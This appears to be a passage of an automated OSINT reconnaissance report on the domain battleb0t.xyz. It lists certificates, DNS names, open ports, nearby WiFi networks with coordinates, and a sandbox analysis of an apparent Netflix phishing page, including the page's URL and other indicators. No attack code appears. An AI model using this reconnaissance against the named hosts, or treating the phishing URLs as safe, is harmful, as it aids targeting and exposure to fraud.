"search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-6', u'n |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Wireless (Net ID: 00:09:5B:34:6B:03) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 02:51:55 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:53:52:1f:22:68:d4:e4:bd:04:c1:ea:37:ae:da:35:a4:38
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Jan 27 17:58:43 2023 GMT
Not After : Apr 27 17:58:42 2023 GMT
Subject: CN=kekw.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:b9:fb:28:d5:65:83:30:d8:31:05:3e:6a:85:ce:
46:6b:90:7d:d6:90:24:15:f6:22:bc:5f:40:25:72:
5b:e7:43:22:3b:78:ef:22:83:15:af:43:b2:d9:fc:
7d:1a:db:a9:94:2a:ae:eb:dd:dd:89:95:48:86:c7:
3d:d8:4e:b8:52:f3:2e:7f:e0:9b:c5:82:6c:d6:06:
76:85:79:68:7f:b5:68:c5:54:d6:da:9f:0d:42:eb:
eb:78:16:9b:0c:f7:71:92:43:a6:d3:11:c7:27:14:
9e:cd:a5:85:3a:ff:06:6c:60:87:93:13:2c:dc:e9:
44:30:af:d5:55:3a:74:21:37:cc:29:72:2e:4e:f5:
19:19:e6:5d:c6:1c:c3:32:ad:91:33:45:63:c0:b2:
66:88:d4:28:10:ab:35:bf:1b:e2:b6:13:51:c2:fc:
05:07:9b:c6:54:ae:64:1d:50:a0:d8:e2:04:77:50:
9f:40:dd:68:16:1e:0c:0e:81:fa:eb:72:cf:f5:36:
95:d2:67:c3:4f:8e:c3:73:28:01:74:88:7e:c4:4f:
a7:e9:b7:fe:c9:c0:ff:2f:b4:44:b8:a3:61:79:25:
57:1a:c6:7d:41:02:2b:48:a8:75:9f:e9:8a:a8:25:
11:37:66:07:b2:f9:47:e8:c4:ab:b8:9a:0e:7a:bb:
b1:a5:ac:71:ee:85:d1:b6:9f:8c:59:d9:a4:ba:7d:
dc:a9:3f:d4:a9:da:6b:49:93:8d:b7:ed:d0:10:10:
3a:3d:a1:8d:54:88:45:8c:e7:d6:54:5d:8e:e4:5d:
c5:ff:df:b9:f9:a2:ee:ab:9f:c6:3f:4b:06:4d:63:
71:ab:51:6b:7d:38:3e:f3:da:53:ac:5a:a8:0b:4f:
7e:c7:d9:39:5d:36:7e:8b:ff:14:dd:1d:2a:34:03:
79:b2:19:e1:3c:2c:2f:e4:2d:a4:3c:e2:7a:8d:47:
92:45:d5:da:6b:08:e3:22:df:a9:94:5a:8f:90:14:
e5:6c:68:e1:1d:22:8f:1f:c3:5c:b7:24:90:75:5a:
e0:2a:31:19:c8:a9:78:9c:0a:51:95:3b:87:0c:a7:
99:0e:be:1b:bc:21:15:fe:dc:b9:6b:b1:e8:e2:43:
9f:ad:fd:5c:22:a4:20:c6:26:c0:2b:14:2d:ae:44:
dc:33:d8:22:aa:11:57:d7:44:19:1d:80:bb:50:5d:
0f:32:1b:da:79:77:90:80:ce:c3:28:c7:75:3b:c6:
47:f2:e5:98:64:b3:70:12:44:40:b0:21:b9:37:16:
ba:3e:63:8e:8d:d6:ba:d1:98:a1:05:b6:1a:03:b9:
41:51:80:5e:8c:55:bd:f9:47:df:ee:3c:ed:aa:ae:
83:f7:8f
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
C8:7D:70:94:FD:01:EF:B0:A3:B3:C1:02:F1:32:C9:D5:2D:71:C9:73
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:kekw.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Jan 27 18:58:43.278 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:27:BC:99:6E:B9:1F:6A:2A:82:FC:B0:CE:
F5:F8:FD:FE:21:58:D7:7D:FB:27:AC:5C:99:23:65:38:
32:60:00:51:02:21:00:B1:8F:B3:D7:A5:5F:86:FC:18:
A7:BF:90:0C:2A:D9:D9:AE:93:DF:0F:67:76:AC:25:C6:
59:7A:82:A1:B8:87:82
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Jan 27 18:58:43.307 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:84:56:FF:69:CD:60:B4:DE:22:F8:A1:
9A:02:89:11:F2:21:CD:A8:DF:20:5A:B5:F1:ED:1C:D2:
C3:DC:97:B9:4B:02:20:7A:A6:80:CD:83:95:32:09:19:
86:6D:57:7E:A9:1E:CD:52:DD:0C:2D:05:7D:5E:5B:20:
62:44:3E:A0:6E:CC:49
Signature Algorithm: sha256WithRSAEncryption
8f:31:80:13:4e:7f:57:8b:2e:1d:55:ff:47:1e:08:9a:4f:f0:
61:cd:76:0c:de:0f:b6:b1:e1:37:7a:3b:31:f7:41:61:6d:26:
3c:f4:3c:91:ce:38:d7:00:d7:14:1b:96:cf:31:d5:a2:f0:ce:
86:08:9d:ae:56:73:2e:35:70:99:f2:a1:d5:f6:c1:25:a1:77:
60:31:12:41:21:3d:c5:3e:a6:f7:ae:19:df:88:d9:d4:98:1c:
d4:ca:ea:97:8d:e9:63:75:bf:4a:82:6f:1a:67:7d:48:0c:0c:
08:ff:f6:95:60:23:b0:46:27:ef:93:ef:4d:f6:79:b3:e9:0a:
ac:f4:de:50:2a:42:3b:da:18:19:58:2d:61:b7:37:20:e9:3b:
f5:7c:74:a7:93:0d:78:f1:3c:2a:a6:84:c3:18:9e:8b:ec:31:
f9:d9:89:02:c1:c6:3c:0b:ac:e1:92:95:ae:5d:e3:0b:08:0d:
f7:ed:0f:4c:8f:0b:db:e5:06:bb:72:05:39:49:bb:58:4f:45:
0e:5b:f1:2e:b2:4b:34:8d:39:4c:05:01:1d:fa:e6:54:8b:64:
f4:28:60:af:2e:58:5a:36:b5:b6:aa:f5:35:93:2e:0a:49:62:
7e:69:d1:23:ae:f4:b5:d9:24:e5:1b:c2:1d:26:18:4d:5e:6b:
93:96:3c:0b
| battleb0t.xyz |
| 2023-05-12 02:59:58 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | name@example.com | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://hassan-gamall.github.io/netflix', u'type': u'submitted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'http://hassan-gamall.github.io/netflix', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_d70_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_d70_ConnHashTable<3440>_HashTable_Mutex"\n "IsoScope_d70_IESQMMUTEX_0_331"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_d70_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3440"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\ZonesCacheCounterMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_d70_IESQMMUTEX_0_303"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_d70_IE_EarlyTabStart_0xf28_Mutex"\n "UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3440"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.108.153:80"\n "185.199.108.153:443"\n "45.57.91.1:443"\n "52.155.62.95:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"hassan-gamall.github.io"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"assets.nflxext.com"\n "hassan-gamall.github.io"\n "query.prod.cms.msn.com"\n "teredo.ipv6.microsoft.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'file/memory contains long string with (Indicator: "dir "; File: "urlref_httphassan-gamall.github.ionetflix")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"o1_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced" and extension "png"\n "device-pile-in_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced" and extension "png"\n "bb_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3" and extension "jpg"\n "mobile-0819_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 640x480 components 3" and extension "jpg"\n "netflix-logo-0_1_.png" has type "PNG image data 2208 x 684 8-bit/color RGBA non-interlaced" and extension "png"\n "tv_1_.png" has type "PNG image data 640 x 480 8-bit colormap non-interlaced" and extension "png"\n "images_1_.png" has type "PNG image data 225 x 225 8-bit colormap non-interlaced" and extension "png"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{ab1e121d-ebc0-11ed-82af-0800276d1839}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dfcf958f5828d0de64.tmp"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{ab1e121b-ebc0-11ed-82af-0800276d1839}.dat"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dfcf958f5828d0de64.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{ab1e121d-ebc0-11ed-82af-0800276d1839}.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\imagestore\\3mt7jhv\\imagestore.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\roaming\\microsoft\\windows\\cookies\\0x82k3c6.txt"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\roaming\\microsoft\\windows\\cookies\\1hgch0kk.txt"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "o1_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "bootstrap.min_1_.css" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "device-pile-in_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "bb_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3"- [targetUID: N/A]\n "bootstrap.bundle.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "mobile-0819_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 640x480 components 3"- [targetUID: N/A]\n "netflix-logo-0_1_.png" has type "PNG image data 2208 x 684 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003440]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF8A0CDA8A96816CC6.TMP" has type "data"- Location: [%TEMP%\\~DF8A0CDA8A96816CC6.TMP]- [targetUID: 00000000-00003440]\n "~DF02F37B05898AC81F.TMP" has type "data"- Location: [%TEMP%\\~DF02F37B05898AC81F.TMP]- [targetUID: 00000000-00003440]\n "~DF432D2BE44D8F536C.TMP" has type "data"- Location: [%TEMP%\\~DF432D2BE44D8F536C.TMP]- [targetUID: 00000000-00003440]\n "~DFCF958F5828D0DE64.TMP" has type "data"- Location: [%TEMP%\\~DFCF958F5828D0DE64.TMP]- [targetUID: 00000000-00003440]\n "imagestore.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\imagestore\\3mt7jhv\\imagestore.dat]- [targetUID: 00000000-00003440]\n "tv_1_.png" has type "PNG image data 640 x 480 8-bit colormap non-interlaced"- [targetUID: N/A]\n "netflix_1_.htm" has type "HTML document UTF-8 Unicode text with very long lines with CRLF line terminators"- [targetUID: N/A]\n "main_1_.css" has type "ASCII text with CRLF line terminators"- [targetUID: N/A]\n "RecoveryStore._AB1E121B-EBC0-11ED-82AF-0800276D1839_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_AB1E121D-EBC0-11ED-82AF-0800276D1839_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_B326E299-EBC0-11ED-82AF-0800276D1839_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "images_1_.png" has type "PNG image data 225 x 225 8-bit colormap non-interlaced"- [targetUID: N/A]\n "GVF5NTIT.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\GVF5NTIT.txt]- [targetUID: 00000000-00003440]\n "IXTTQ3R7.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\IXTTQ3R7.txt]- [targetUID: 00000000-00003440]\n "8BT6E19R.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\8BT6E19R.txt]- [targetUID: 00000000-00003440]\n "search_2_.json" has ty |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | leo (Net ID: 00:01:71:0A:06:4D) | 52.3759, 4.8975 |
| 2023-05-12 02:46:55 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | www.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:cd:b7:3c:d6:71:f3:4f:d0:0b:1c:3a:89:f9:32:41:9b:99
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Nov 17 13:22:44 2022 GMT
Not After : Feb 15 13:22:43 2023 GMT
Subject: CN=www.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:bd:87:9d:fd:0d:e7:91:1c:82:de:38:55:01:b8:
01:a4:4f:91:68:f2:b6:41:bd:96:b7:21:f2:a0:55:
3b:8f:fb:94:98:1c:4d:61:0a:0d:49:1e:41:02:01:
75:0f:0f:e7:3e:9d:a4:2e:1d:07:1e:23:ae:57:ed:
a8:d0:66:39:2d:83:68:be:6e:6f:58:41:0a:9a:c5:
3e:12:87:89:8c:60:e5:de:67:7a:e4:46:2e:7b:08:
ed:c2:60:17:80:e6:b4:45:ca:55:4c:b4:aa:5a:0e:
21:b2:65:97:04:7d:42:9a:78:70:55:51:b1:3b:c5:
d3:0d:ce:41:3b:0f:13:16:72:ef:e1:6f:39:c8:fd:
4b:2d:7e:9e:b0:41:fd:9c:7c:61:84:dd:e4:70:a7:
c5:c7:ec:ba:20:9f:a0:1f:9c:1c:14:59:c8:6c:6b:
82:ec:5e:ff:5a:3a:74:2a:f6:b9:fb:b1:ab:97:21:
90:d8:cd:5c:36:36:0e:73:80:7f:e4:4a:7c:cd:5d:
9a:1e:e6:d5:29:40:7a:8c:74:6b:33:02:0d:4e:19:
f0:00:4b:c5:69:8a:06:03:20:76:15:a8:c2:2f:17:
7a:d2:cd:b7:58:14:91:a2:f2:64:cf:8f:82:14:81:
ba:d6:41:8b:94:86:36:f5:f5:da:76:a8:04:5b:ad:
f0:59
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
57:48:2A:D8:70:70:AC:E4:0A:F6:8C:02:EF:80:5A:28:2D:B1:3C:AE
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:www.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
36:fd:c3:ee:77:8a:70:b0:4d:2d:e7:2a:5c:5f:4d:da:b4:a1:
e2:01:81:ed:f5:51:9e:99:02:16:e3:a3:0b:1f:75:93:c8:5e:
b9:d7:f5:17:db:c5:b5:da:58:15:fd:4b:36:d5:4d:d6:5d:2b:
4f:49:fe:17:38:11:d4:b2:eb:07:49:19:e3:43:16:4c:57:7c:
97:e9:db:e2:60:b9:08:77:50:48:9b:b0:17:ef:9d:09:42:2e:
2c:30:28:d5:83:ed:da:76:33:41:0d:5b:41:19:c5:b8:7f:74:
cf:bd:8b:ac:7e:2d:b1:2d:d2:aa:05:f2:50:61:9c:8f:16:2d:
59:13:65:6c:9c:0b:8f:2b:a9:e1:4d:ad:99:3c:ae:24:73:55:
9d:81:3b:f1:9e:69:4c:61:66:fb:26:19:5a:2f:78:df:76:be:
4f:90:40:ce:71:fc:d7:53:04:9e:03:82:87:39:e3:ba:6f:94:
e1:23:1d:69:45:b3:a4:42:55:02:7e:d3:af:be:34:75:9f:16:
a6:29:8b:66:c6:ca:4a:93:de:4b:14:90:c7:14:68:7f:9c:0a:
30:11:89:14:58:e3:55:39:f0:a4:c6:80:42:fc:39:c9:c9:40:
ba:10:84:83:2d:87:52:29:63:ea:37:f2:50:8b:de:a9:ff:9e:
bc:f4:cc:e6
|
| 2023-05-12 03:09:54 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | plesk2.keyubu.net | 87.248.157.100 |
| 2023-05-12 03:01:44 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.226): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:54:20 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://funny.battleb0t.xyz/images/withat_5.jpg | https://funny.battleb0t.xyz/ |
| 2023-05-12 02:54:17 | Software Used | Yes | Censys | 0 | 0 | 4 | 0 | None | CloudFlare CloudFlare Load Balancer | 2606:4700:3037::6815:470e |
| 2023-05-12 02:55:11 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 87.248.157.102:2080 | 87.248.157.102 |
| 2023-05-12 03:13:08 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [00xkhaled.github.io]
https://www.openphish.com/feed.txt | 00xkhaled.github.io |
| 2023-05-12 02:56:51 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | kekw.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:53:52:1f:22:68:d4:e4:bd:04:c1:ea:37:ae:da:35:a4:38
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Jan 27 17:58:43 2023 GMT
Not After : Apr 27 17:58:42 2023 GMT
Subject: CN=kekw.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:b9:fb:28:d5:65:83:30:d8:31:05:3e:6a:85:ce:
46:6b:90:7d:d6:90:24:15:f6:22:bc:5f:40:25:72:
5b:e7:43:22:3b:78:ef:22:83:15:af:43:b2:d9:fc:
7d:1a:db:a9:94:2a:ae:eb:dd:dd:89:95:48:86:c7:
3d:d8:4e:b8:52:f3:2e:7f:e0:9b:c5:82:6c:d6:06:
76:85:79:68:7f:b5:68:c5:54:d6:da:9f:0d:42:eb:
eb:78:16:9b:0c:f7:71:92:43:a6:d3:11:c7:27:14:
9e:cd:a5:85:3a:ff:06:6c:60:87:93:13:2c:dc:e9:
44:30:af:d5:55:3a:74:21:37:cc:29:72:2e:4e:f5:
19:19:e6:5d:c6:1c:c3:32:ad:91:33:45:63:c0:b2:
66:88:d4:28:10:ab:35:bf:1b:e2:b6:13:51:c2:fc:
05:07:9b:c6:54:ae:64:1d:50:a0:d8:e2:04:77:50:
9f:40:dd:68:16:1e:0c:0e:81:fa:eb:72:cf:f5:36:
95:d2:67:c3:4f:8e:c3:73:28:01:74:88:7e:c4:4f:
a7:e9:b7:fe:c9:c0:ff:2f:b4:44:b8:a3:61:79:25:
57:1a:c6:7d:41:02:2b:48:a8:75:9f:e9:8a:a8:25:
11:37:66:07:b2:f9:47:e8:c4:ab:b8:9a:0e:7a:bb:
b1:a5:ac:71:ee:85:d1:b6:9f:8c:59:d9:a4:ba:7d:
dc:a9:3f:d4:a9:da:6b:49:93:8d:b7:ed:d0:10:10:
3a:3d:a1:8d:54:88:45:8c:e7:d6:54:5d:8e:e4:5d:
c5:ff:df:b9:f9:a2:ee:ab:9f:c6:3f:4b:06:4d:63:
71:ab:51:6b:7d:38:3e:f3:da:53:ac:5a:a8:0b:4f:
7e:c7:d9:39:5d:36:7e:8b:ff:14:dd:1d:2a:34:03:
79:b2:19:e1:3c:2c:2f:e4:2d:a4:3c:e2:7a:8d:47:
92:45:d5:da:6b:08:e3:22:df:a9:94:5a:8f:90:14:
e5:6c:68:e1:1d:22:8f:1f:c3:5c:b7:24:90:75:5a:
e0:2a:31:19:c8:a9:78:9c:0a:51:95:3b:87:0c:a7:
99:0e:be:1b:bc:21:15:fe:dc:b9:6b:b1:e8:e2:43:
9f:ad:fd:5c:22:a4:20:c6:26:c0:2b:14:2d:ae:44:
dc:33:d8:22:aa:11:57:d7:44:19:1d:80:bb:50:5d:
0f:32:1b:da:79:77:90:80:ce:c3:28:c7:75:3b:c6:
47:f2:e5:98:64:b3:70:12:44:40:b0:21:b9:37:16:
ba:3e:63:8e:8d:d6:ba:d1:98:a1:05:b6:1a:03:b9:
41:51:80:5e:8c:55:bd:f9:47:df:ee:3c:ed:aa:ae:
83:f7:8f
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
C8:7D:70:94:FD:01:EF:B0:A3:B3:C1:02:F1:32:C9:D5:2D:71:C9:73
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:kekw.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Jan 27 18:58:43.278 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:27:BC:99:6E:B9:1F:6A:2A:82:FC:B0:CE:
F5:F8:FD:FE:21:58:D7:7D:FB:27:AC:5C:99:23:65:38:
32:60:00:51:02:21:00:B1:8F:B3:D7:A5:5F:86:FC:18:
A7:BF:90:0C:2A:D9:D9:AE:93:DF:0F:67:76:AC:25:C6:
59:7A:82:A1:B8:87:82
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Jan 27 18:58:43.307 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:84:56:FF:69:CD:60:B4:DE:22:F8:A1:
9A:02:89:11:F2:21:CD:A8:DF:20:5A:B5:F1:ED:1C:D2:
C3:DC:97:B9:4B:02:20:7A:A6:80:CD:83:95:32:09:19:
86:6D:57:7E:A9:1E:CD:52:DD:0C:2D:05:7D:5E:5B:20:
62:44:3E:A0:6E:CC:49
Signature Algorithm: sha256WithRSAEncryption
8f:31:80:13:4e:7f:57:8b:2e:1d:55:ff:47:1e:08:9a:4f:f0:
61:cd:76:0c:de:0f:b6:b1:e1:37:7a:3b:31:f7:41:61:6d:26:
3c:f4:3c:91:ce:38:d7:00:d7:14:1b:96:cf:31:d5:a2:f0:ce:
86:08:9d:ae:56:73:2e:35:70:99:f2:a1:d5:f6:c1:25:a1:77:
60:31:12:41:21:3d:c5:3e:a6:f7:ae:19:df:88:d9:d4:98:1c:
d4:ca:ea:97:8d:e9:63:75:bf:4a:82:6f:1a:67:7d:48:0c:0c:
